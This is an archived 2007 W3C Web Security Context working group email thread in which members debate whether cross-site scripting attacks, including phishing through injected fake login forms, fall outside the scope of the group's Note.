RE: XSS out of scope from Dan Schutzer on 2007-04-06 (public-wsc-wg@w3.org from April 2007)

From: Dan Schutzer <dan.schutzer@fstc.org>
Date: Fri, 6 Apr 2007 10:39:12 -0400
To: "'Mary Ellen Zurko'" <Mary_Ellen_Zurko@notesdev.ibm.com>, "'Shawn Duffy <sduffy'" <sduffy@aol.net>
Cc: <public-wsc-wg@w3.org>, "'Close, Tyler J.'" <tyler.close@hp.com>
Message-ID: <013401c77859$58b30c20$6500a8c0@dschutzer>

I don't think this should be out of scope, some of our solutions address how
to mitigate this. And some of our suggestions for strengthening the Browser
also help in this area.

  _____  

From: public-wsc-wg-request@w3.org [mailto:public-wsc-wg-request@w3.org] On
Behalf Of Mary Ellen Zurko
Sent: Friday, April 06, 2007 10:11 AM
To: Shawn Duffy <sduffy
Cc: public-wsc-wg@w3.org; Close, Tyler J.
Subject: Re: XSS out of scope

I think it has to be. But could you offer up a scenario of what we would do
it if wasn't, just so I can be sure? (or maybe someone who's sure will
answer). 

          Mez

Mary Ellen Zurko, STSM, IBM Lotus CTO Office       (t/l 333-6389)
Lotus/WPLC Security Strategy and Patent Innovation Architect

Shawn Duffy <sduffy@aol.net>
Sent by: public-wsc-wg-request@w3.org

04/05/2007 10:44 AM

To

"Close, Tyler J." <tyler.close@hp.com>

cc

public-wsc-wg@w3.org

Subject

Re: XSS out of scope

Does this also include phishing that is only made possible via XSS, such
as a "trusted" site that has been injected with a fake login form via
XSS?  Is that also out of scope?  Just want to make sure I'm clear where
we're drawing the boundary...

Close, Tyler J. wrote:
> I've added a new Out of scope section to our Note to cover XSS attacks.
> See:
> 
> http://www.w3.org/2006/WSC/drafts/note/#XSS
> 
> This edit addresses ACTION-160
> 
> Tyler
>

Received on Friday, 6 April 2007 14:40:01 UTC